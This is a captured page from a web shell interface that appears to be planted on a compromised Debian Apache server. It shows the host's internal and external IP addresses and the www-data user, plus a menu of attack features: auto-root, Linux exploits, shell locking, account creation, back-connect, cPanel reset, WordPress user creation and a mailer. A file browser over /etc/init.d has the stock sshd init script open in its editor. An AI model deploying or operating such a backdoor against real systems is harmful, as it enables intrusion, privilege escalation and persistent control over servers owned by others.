Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.221.217.100
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
init.d /
[ HOME SHELL ]
Name
Size
Permission
Action
.depend.boot
1.39
KB
-rw-r--r--
.depend.start
729
B
-rw-r--r--
.depend.stop
1.23
KB
-rw-r--r--
README
2.37
KB
-rw-r--r--
acpid
2.22
KB
-rwxr-xr-x
apache-htcacheclean
2.43
KB
-rwxr-xr-x
apache2
7.99
KB
-rwxr-xr-x
apparmor
3.65
KB
-rwxr-xr-x
atd
1.05
KB
-rwxr-xr-x
bootlogs
1.25
KB
-rwxr-xr-x
bootmisc.sh
1.2
KB
-rwxr-xr-x
brightness
2.13
KB
-rwxr-xr-x
checkfs.sh
3.56
KB
-rwxr-xr-x
checkroot-bootclean.sh
1.05
KB
-rwxr-xr-x
checkroot.sh
9.3
KB
-rwxr-xr-x
console-setup.sh
1.2
KB
-rwxr-xr-x
cron
2.99
KB
-rwxr-xr-x
dbus
2.75
KB
-rwxr-xr-x
exim4
6.99
KB
-rwxr-xr-x
firewalld
2.25
KB
-rwxr-xr-x
halt
1.3
KB
-rwxr-xr-x
hostname.sh
927
B
-rwxr-xr-x
hwclock.sh
3.72
KB
-rwxr-xr-x
irqbalance
2.39
KB
-rwxr-xr-x
keyboard-setup.sh
1.44
KB
-rwxr-xr-x
killprocs
1.27
KB
-rwxr-xr-x
kmod
2
KB
-rwxr-xr-x
mountall-bootclean.sh
677
B
-rwxr-xr-x
mountall.sh
2.67
KB
-rwxr-xr-x
mountdevsubfs.sh
1.43
KB
-rwxr-xr-x
mountkernfs.sh
1.53
KB
-rwxr-xr-x
mountnfs-bootclean.sh
685
B
-rwxr-xr-x
mountnfs.sh
2.39
KB
-rwxr-xr-x
mysql
6.06
KB
-rwxr-xr-x
netfilter-persistent
1.33
KB
-rwxr-xr-x
networking
4.34
KB
-rwxr-xr-x
nfs-common
5.53
KB
-rwxr-xr-x
php5.6-fpm
4.19
KB
-rwxr-xr-x
php7.0-fpm
4.19
KB
-rwxr-xr-x
php7.2-fpm
4.19
KB
-rwxr-xr-x
php7.3-fpm
4.19
KB
-rwxr-xr-x
php7.4-fpm
4.19
KB
-rwxr-xr-x
php8.2-fpm
4.19
KB
-rwxr-xr-x
procps
924
B
-rwxr-xr-x
rc
6.13
KB
-rwxr-xr-x
rc.local
820
B
-rwxr-xr-x
rcS
117
B
-rwxr-xr-x
reboot
661
B
-rwxr-xr-x
rmnologin
1.01
KB
-rwxr-xr-x
rpcbind
2.42
KB
-rwxr-xr-x
rsync
4.31
KB
-rwxr-xr-x
rsyslog
2.8
KB
-rwxr-xr-x
saned
2.17
KB
-rwxr-xr-x
sendsigs
3.13
KB
-rwxr-xr-x
single
592
B
-rwxr-xr-x
ssh
3.85
KB
-rwxr-xr-x
sudo
1.01
KB
-rwxr-xr-x
udev
6.71
KB
-rwxr-xr-x
umountfs
2.71
KB
-rwxr-xr-x
umountnfs.sh
2.21
KB
-rwxr-xr-x
umountroot
1.21
KB
-rwxr-xr-x
unattended-upgrades
1.36
KB
-rwxr-xr-x
urandom
3.04
KB
-rwxr-xr-x
x11-common
2.69
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ssh
#! /bin/sh ### BEGIN INIT INFO # Provides: sshd # Required-Start: $remote_fs $syslog # Required-Stop: $remote_fs $syslog # Default-Start: 2 3 4 5 # Default-Stop: # Short-Description: OpenBSD Secure Shell server ### END INIT INFO set -e # /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon test -x /usr/sbin/sshd || exit 0 ( /usr/sbin/sshd -\? 2>&1 | grep -q OpenSSH ) 2>/dev/null || exit 0 umask 022 if test -f /etc/default/ssh; then . /etc/default/ssh fi . /lib/lsb/init-functions if [ -n "$2" ]; then SSHD_OPTS="$SSHD_OPTS $2" fi # Are we running from init? run_by_init() { ([ "$previous" ] && [ "$runlevel" ]) || [ "$runlevel" = S ] } check_for_no_start() { # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists if [ -e /etc/ssh/sshd_not_to_be_run ]; then if [ "$1" = log_end_msg ]; then log_end_msg 0 || true fi if ! run_by_init; then log_action_msg "OpenBSD Secure Shell server not in use (/etc/ssh/sshd_not_to_be_run)" || true fi exit 0 fi } check_dev_null() { if [ ! -c /dev/null ]; then if [ "$1" = log_end_msg ]; then log_end_msg 1 || true fi if ! run_by_init; then log_action_msg "/dev/null is not a character device!" || true fi exit 1 fi } check_privsep_dir() { # Create the PrivSep empty dir if necessary if [ ! -d /run/sshd ]; then mkdir /run/sshd chmod 0755 /run/sshd fi } check_config() { if [ ! -e /etc/ssh/sshd_not_to_be_run ]; then /usr/sbin/sshd $SSHD_OPTS -t || exit 1 fi } export PATH="${PATH:+$PATH:}/usr/sbin:/sbin" case "$1" in start) check_privsep_dir check_for_no_start check_dev_null log_daemon_msg "Starting OpenBSD Secure Shell server" "sshd" || true if start-stop-daemon --start --quiet --oknodo --chuid 0:0 --pidfile /run/sshd.pid --exec /usr/sbin/sshd -- $SSHD_OPTS; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; stop) log_daemon_msg "Stopping OpenBSD Secure Shell server" "sshd" || true if start-stop-daemon --stop --quiet --oknodo --pidfile /run/sshd.pid --exec /usr/sbin/sshd; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; reload|force-reload) check_for_no_start check_config log_daemon_msg "Reloading OpenBSD Secure Shell server's configuration" "sshd" || true if start-stop-daemon --stop --signal 1 --quiet --oknodo --pidfile /run/sshd.pid --exec /usr/sbin/sshd; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; restart) check_privsep_dir check_config log_daemon_msg "Restarting OpenBSD Secure Shell server" "sshd" || true start-stop-daemon --stop --quiet --oknodo --retry 30 --pidfile /run/sshd.pid --exec /usr/sbin/sshd check_for_no_start log_end_msg check_dev_null log_end_msg if start-stop-daemon --start --quiet --oknodo --chuid 0:0 --pidfile /run/sshd.pid --exec /usr/sbin/sshd -- $SSHD_OPTS; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; try-restart) check_privsep_dir check_config log_daemon_msg "Restarting OpenBSD Secure Shell server" "sshd" || true RET=0 start-stop-daemon --stop --quiet --retry 30 --pidfile /run/sshd.pid --exec /usr/sbin/sshd || RET="$?" case $RET in 0) # old daemon stopped check_for_no_start log_end_msg check_dev_null log_end_msg if start-stop-daemon --start --quiet --oknodo --chuid 0:0 --pidfile /run/sshd.pid --exec /usr/sbin/sshd -- $SSHD_OPTS; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; 1) # daemon not running log_progress_msg "(not running)" || true log_end_msg 0 || true ;; *) # failed to stop log_progress_msg "(failed to stop)" || true log_end_msg 1 || true ;; esac ;; status) status_of_proc -p /run/sshd.pid /usr/sbin/sshd sshd && exit 0 || exit $? ;; *) log_action_msg "Usage: /etc/init.d/ssh {start|stop|reload|force-reload|restart|try-restart|status}" || true exit 1 esac exit 0
Close